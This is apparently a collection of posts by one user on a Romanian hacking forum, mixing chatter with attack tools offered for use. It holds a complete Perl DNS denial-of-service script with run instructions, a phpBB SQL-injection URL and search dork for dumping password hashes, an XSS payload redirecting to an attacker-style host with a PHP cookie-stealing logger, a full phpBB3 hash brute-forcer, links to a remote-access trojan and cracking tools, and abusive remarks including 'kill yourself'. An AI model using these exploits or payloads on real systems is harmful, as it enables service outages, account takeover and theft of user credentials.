puskin

heheheee te-ai prins

copaci sunt reali...si cerul este "aproape real" dar intreaga fotografie este un un singur peisaj?

Descoperiti daca imaginea de mai jos este reala sau virtuala si explicati de ce.

Poti face reverse en. si aflii parola foarte repede..... Dar din ce am vazut eu programul asta nu o sa mearga in veci... http://netdecompiler.com/download/DisSharp.zip

cum se foloseste exploit-ul asta???? L-am bagat in "index.html" dar imi da eroarea: pe moz nu da eroarea dar nu influenteaza cu nik messengeru'

Cred ca suntem "programati" ca mintea noastra sa nu treaca de aceste bariere...ceva gen matrix...

(MT) = Moved to Trash ! Be a smart boy, kill yourself

vaiii...nu imi plac stirile de genu... :oops:

Am postat asa sa stie si cei care nu se prea pricep la .pl

-milw0rm-DNS Simple Plus-Remote Denial of Service Exploit-COMPILED Credit: http://www.milw0rm.com/exploits/6059 Instalati Active Pearl: http://rapidshare.com/files/129457472/ActivePerl-5.10.0.1002-MSWin32-x86-283697.msi.html va crea directoarele: -Perl: -bin -etc -eg -html -lib Exploit: http://rapidshare.com/files/129458504/sdns-dos.pl.html Intrati in Start>Run si tastati locatia directorului unde aveti exploitul sdns-dos.pl (se poate edita cu wordpad ff.simplu) ex: C:\Documents and Settings\User\Desktop\sdns-dos.pl dati run si introduceti adresa serverului: 89.34.21.111 (luat la intamplare ca exemplu..) portul dns 53 nr. de pachete expediate intre 10000 si 10000000 cam asa trebuie sa arate in consola "Run": C:\Documets and...\Desktop\sdns-dos.pl 89.34.21.111 53 1000000 Cod : use IO::Socket; if(@ARGV < 3){ print("sdns-dos.pl <dns server> <dns source port> <num of packets>"); } $sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'UDP') || die("Cant connect DNS server"); $address = $ARGV[0]; $trans = pack("H4","1337"); $flags = pack("B16","1000010110110000"); $question = pack("H4","0001"); $answerRR = pack("H4","0001"); $authorityRR = pack("H4","0000"); $additionlRR = pack("H4","0000"); $type = pack("H4","0001"); # A host name $class = pack("H4","0001"); # IN @parts = split(/\./,$address); foreach $part (@parts) { $packedlen = pack("H2",sprintf("%02x",length($part))); $address2 .= $packedlen.$part; } $query = $address2. "\000" . $type . $class; $aname = pack("H4","c00c"); $atype = pack("H4","0001"); $aclass = pack("H4","0001"); $ttl = pack("H8","0000008d"); $dlen = pack("H4","0004"); $addr = inet_aton("127.0.0.1"); $answer = $aname . $atype . $aclass . $ttl . $dlen . $addr; $payload = $trans . $flags . $question . $answerRR . $authorityRR . $additionlRR . $query . $answer; print "sending $ARGV[2] packets… "; for($i=0;$i<=$ARGV[2];$i++) { print $sock $payload; } print "Done. Good bye."; __END__

e la fel de inteligenta ca si comentariul tau...puteai sa dai un click dreapta>proprieties sa vezi de unde este poza si daca am "hasurat-o" eu oricum ai inceput cu stangul..ca si basescu activitatea ta in cadrul acestui forum...dupa cum se vede mai jos:

Brutus HTTP password cracker Find a login form or Cpanel form with no brute-force protection on it. Then read the settings from file included. Download http://rapidshare.com/files/129401469/brutus.zip.html Credit: www.hackerswisdom.com

----=====[* A CIPHERCREW RELEASE*]=====----- ===[FOUND BY BaKo]=== ######################################## Script: phpBB Fully Moded ######################################## Type: Remote Command Execution ######################################## Usage: http://site.com/path/kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1 ####################################### dork: "Modified by Fully Modded" inurl:kb.php "all content is copyright" "its original authors" ####################################### Discovered by: BaKo ####################################### Status: reported, released by another noob who got our leaked sploit... but we found it first Wink ####################################### Greetz to: xprog, Novalok, dr wh4x, tulle, inspiratio, illuz1on, cam-man-dan, optiplex, Untamed, GM, t0pPg4y, Thedefaced, ~removed~, and everyone else I forgot ######################################## ~censored~: all of balcan-crew, those exploit leaking faggots. ######################################## credit:h4cky0u.org

################################################## #################################### # # # Authors: Dante90, WaRWolFz Crew # # T0T4L, Ex Member Crew # # Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] # # MSN: [email]dante90.dmc4@hotmail.it[/email] # # Web: [url]www.warwolfz.org[/url] # # Description: XSS (Cross Site Scripting), Grab Status: 100%. # # # ################################################## #################################### XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] Quote: [url]http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[/url][xss]&p=6779 Where is: Quote: [xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))} Redirect Code [Ascii --> Hex]: Quote: [xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e (<script src=http://www.evilsite.org/WaRWolFz/file.js>) Cookies grabber: Quote: <?php $ip = $_SERVER['REMOTE_ADDR']; $referer = $_SERVER['HTTP_REFERER']; $agent = $_SERVER['HTTP_USER_AGENT']; $data = $_GET['warwolfz']; $time = date("Y-m-d G:i:s A"); $text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nU ser-Agent:".$agent."\nCookie:".$data."\n\n"; $file = fopen('cookies.html' , 'a'); fwrite($file,$text); fclose($file); ?> credit:http://www.h4cky0u.org

#!/usr/bin/php <?php set_time_limit(0); echo "///////////////////////////////////////////////\r\n"; echo "// PHPBB3 Bruteforce //\r\n"; echo "// Original bruteforce script by Tux //\r\n"; echo "// Moded for Phpbb3 by Jeforce //\r\n"; echo "// [url]http://www.jeforce.net[/url] //\r\n"; echo "////////////////////////////////////////////\r\n"; if ($argc<2 || $argv[1]=='--help') { echo<<<END USAGE: {$argv[0]} 'hash' chars - hash : The hash to crack - chars : Max length string to attempt to crack HELP: {$argv[0]} --help END; exit; } //Fonction PHPBB3 function _hash_crypt_private($password, $setting, &$itoa64) { $output = '*'; // Check for correct hash if (substr($setting, 0, 3) != '$H$') {return $output;} $count_log2 = strpos($itoa64, $setting[3]); if ($count_log2 < 7 || $count_log2 > 30) {return $output;} $count = 1 << $count_log2; $salt = substr($setting, 4, 8); if (strlen($salt) != 8) {return $output;} $hash = pack('H*', md5($salt . $password)); do { $hash = pack('H*', md5($hash . $password)); } while (--$count); $output = substr($setting, 0, 12); $output .= _hash_encode64($hash, 16, $itoa64); return $output; } function _hash_gensalt_private($input, &$itoa64, $iteration_count_log2 = 6) { if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31) {$iteration_count_log2 = 8;} $output = '$H$'; $output .= $itoa64[min($iteration_count_log2 + ((PHP_VERSION >= 5) ? 5 : 3), 30)]; $output .= _hash_encode64($input, 6, $itoa64); return $output; } /** * Encode hash */ function _hash_encode64($input, $count, &$itoa64) { $output = ''; $i = 0; do { $value = ord($input[$i++]); $output .= $itoa64[$value & 0x3f]; if ($i < $count) {$value |= ord($input[$i]) << 8;} $output .= $itoa64[($value >> 6) & 0x3f]; if ($i++ >= $count) {break;} if ($i < $count) {$value |= ord($input[$i]) << 16;} $output .= $itoa64[($value >> 12) & 0x3f]; if ($i++ >= $count) {break;} $output .= $itoa64[($value >> 18) & 0x3f]; } while ($i < $count); return $output; } function phpbb_check_hash($password, $hash) { $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; if (strlen($hash) == 34) { return (_hash_crypt_private($password, $hash, $itoa64) === $hash) ? true : false; } return (md5($password) === $hash) ? true : false; } //if(isset($argv[4])) $charset=$argv[4]; //else $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; $charset_beginning = $charset{0}; $charset_end = $charset{strlen($charset)-1}; //$HASH = '$H$99i1.eNyzhGdi5/lAnKnSjU8iIABC80'; // $SIZE = (int) $_GET['chars']; $HASH = $argv[1]; $SIZE = (int) $argv[2]; $start = time()-1; $curtotal=0; $total=0; for($i=$SIZE; $i>0; $i--) $total+=pow(strlen($charset), $i); $split=ceil(($total/strlen($charset))/5); echo " *** MAX SIZE: $SIZE, cracking HASH: $HASH\r\n"; echo " *** TOTAL KEYS: $total\r\n"; echo " *** CHARSET: $charset\r\n"; for($i=1; $i<=$SIZE; $i++) { $keyspace = pow(strlen($charset), $i); echo "\r\nAttempting to crack with $i characters.\r\n"; echo " *** Total combinations: $keyspace\r\n"; $key = ''; for ($y=0; $y<$i; $y++) $key .= $charset_beginning; for ($x=0; $x<$keyspace+1; $x++) { $curtotal++; if (phpbb_check_hash($key, $HASH)) { $time=(time()-$start); echo<<<END Successfully key cracked after $time seconds. The cracker searched a total of $curtotal keys out of a possible $total in $time seconds. Found the clear text of '$HASH' is '$key'.\n END; exit; } if($x%$split == 0) { $rate=ceil($curtotal/(time()-$start)); echo " ... $curtotal/$total ($key) [$rate Keys/second]\r\n"; } for ($y=0; $y<$i; $y++) { if ($key[$y] != $charset_end) { $key[$y] = $charset{strpos($charset, $key[$y])+1}; if ($y > 0) for ($z = 0; $z < $y; $z++) $key[$z] = $charset_beginning; break; } } } } $time=time()-$start; echo<<<END *** SORRY NO MATCHS FOUND Time running : $time. Keys searched : $total.\n END; ?> Usage: php script.php 'hash' chars Example jeforce@localhost:/var/www$ php5 phpbb3bruteforce.php '$H$9th2E96doaV4kIqYd8tH4kNdSdaXR4.' 4 /////////////////////////////////////////////// // PHPBB3 Bruteforcer // // Original bruteforce script by Tux // // Moded for Phpbb3 by Jeforce // // [url]http://www.jeforce.net[/url] // //////////////////////////////////////////// *** MAX SIZE: 4, cracking HASH: $H$9th2E96doaV4kIqYd8tH4kNdSdaXR4. *** TOTAL KEYS: 15018570 *** CHARSET: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Attempting to crack with 1 characters. *** Total combinations: 62 ... 1/15018570 (a) [1 Keys/second] Attempting to crack with 2 characters. *** Total combinations: 3844 ... 64/15018570 (aa) [64 Keys/second] Successfully key cracked after 12 seconds. The cracker searched a total of 3434 keys out of a possible 15018570 in 12 seconds. Found the clear text of '$H$9th2E96doaV4kIqYd8tH4kNdSdaXR4.' is 'w2'. Credit:http://www.h4cky0u.org sau: <? function phpbb_hash($password) { $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; $random_state = unique_id(); $random = ''; $count = 6; if (($fh = @fopen('/dev/urandom', 'rb'))) { $random = fread($fh, $count); fclose($fh); } if (strlen($random) < $count) { $random = ''; for ($i = 0; $i < $count; $i += 16) { $random_state = md5(unique_id() . $random_state); $random .= pack('H*', md5($random_state)); } $random = substr($random, 0, $count); } $hash = _hash_crypt_private($password, _hash_gensalt_private($random, $itoa64), $itoa64); if (strlen($hash) == 34) { return $hash; } return md5($password); } function unique_id($extra = 'c') { static $dss_seeded = false; global $config; $val = $config['rand_seed'] . microtime(); $val = md5($val); $config['rand_seed'] = md5($config['rand_seed'] . $val . $extra); if ($dss_seeded !== true && ($config['rand_seed_last_update'] < time() - rand(1,10))) { $config['rand_seed_last_update']=time(); $dss_seeded = true; } return substr($val, 4, 16); } function _hash_crypt_private($password, $setting, &$itoa64) { $output = '*'; // Check for correct hash if (substr($setting, 0, 3) != '$H$') { return $output; } $count_log2 = strpos($itoa64, $setting[3]); if ($count_log2 < 7 || $count_log2 > 30) { return $output; } $count = 1 << $count_log2; $salt = substr($setting, 4, 8); if (strlen($salt) != 8) { return $output; } /** * We're kind of forced to use MD5 here since it's the only * cryptographic primitive available in all versions of PHP * currently in use. To implement our own low-level crypto * in PHP would result in much worse performance and * consequently in lower iteration counts and hashes that are * quicker to crack (by non-PHP code). */ $hash = pack('H*', md5($salt . $password)); do { $hash = pack('H*', md5($hash . $password)); } while (--$count); $output = substr($setting, 0, 12); $output .= _hash_encode64($hash, 16, $itoa64); return $output; } function _hash_gensalt_private($input, &$itoa64, $iteration_count_log2 = 6) { if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31) { $iteration_count_log2 = 8; } $output = '$H$'; $output .= $itoa64[min($iteration_count_log2 + ((PHP_VERSION >= 5) ? 5 : 3), 30)]; $output .= _hash_encode64($input, 6, $itoa64); return $output; } /** * Encode hash */ function _hash_encode64($input, $count, &$itoa64) { $output = ''; $i = 0; do { $value = ord($input[$i++]); $output .= $itoa64[$value & 0x3f]; if ($i < $count) { $value |= ord($input[$i]) << 8; } $output .= $itoa64[($value >> 6) & 0x3f]; if ($i++ >= $count) { break; } if ($i < $count) { $value |= ord($input[$i]) << 16; } $output .= $itoa64[($value >> 12) & 0x3f]; if ($i++ >= $count) { break; } $output .= $itoa64[($value >> 18) & 0x3f]; } while ($i < $count); return $output; } function phpbb_check_hash($password, $hash) { $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; if (strlen($hash) == 34) { return (_hash_crypt_private($password, $hash, $itoa64) === $hash) ? true : false; } return (md5($password) === $hash) ? true : false; } $val=phpbb_hash('admin123'); if(phpbb_check_hash("admin123", $val)) { echo "Value is true"; } else { echo "val is false"; } #."<br>".phpbb_hash('admin123'); ?> [quote][/quote]

voi nu stiti sa cititi..: /* works regardless of php.ini settings you need a global moderator account with "simple moderator" role */

Puteai sa-mi dai un pm... Beast 2.07 standard http://rapidshare.com/files/128853188/Beast2.07.exe.html

Cei aia "mortal team" sau "elitte.eu" sa mor eu daca am auzit de asa ceva poate doar un CANAL de iRC# sa fie.....de 15 ani de cand lucrez cu computerul conectat la internet nu am auzit de ei....Sau chiar sa fi auzit de mortal team (in nici un caz elitte...) nu mia sarit in ochi sa fie ceva deosebit in afara de niste mircari de 2 lei...probabil ca acum vor sa fie persoane publice ceva gen cum a fost cu Conquiztador....

niste email-uri asociate unor useri...:

get out fast or Puskin will make you cry ! chello2000 vrei ban? daca te vad ca mai scrii "puskin" pe undeva ai avertisment de la admin, sa nu zici ca nu ti-am spus...

http://incarcare-cartele-telefon.execom.ro

Daca mai vad baliverne de 2 lei ca cele de mai sus "puskin e...puskin a facut puskin....etc" o sa rog un admin sa va dea avertismentm exista off-topic pentru asa ceva !

Interesant postul....o sa ma gandesc la ceva... http://www.kakatdejoc.travian.ro/

Metode pot fi multe...cel mai bine ar fi sa pui programul aici sa vedem despre ce este vorba..sa stii ca ReverseE nu merge dupa manual tot timpul...de aceea trebuie programul, sau macar codul hex...dar care ocupa prea mult spatiu...

Asa numitele "transparent mirrors" Akamai, chiar daca le dai un "bypass" si directionezi direct ddos-ul catre serverele yahoo, serverele yahoo automat isi realizeaza legatura catre un lant de "mirrors" secundar, iar acele servere (primele de care treci cu atacul) akamai sunt inchise pana la rezolvarea exploitului.Exploitul efectuand comenzi in gol si neputand sa se conformeze la noile mirrors akamai, ar insemna lansarea altui atac pentru noile coordonate...dar pana atunci ei rezolva problema. Acum 2 ani a fost o situatie similara.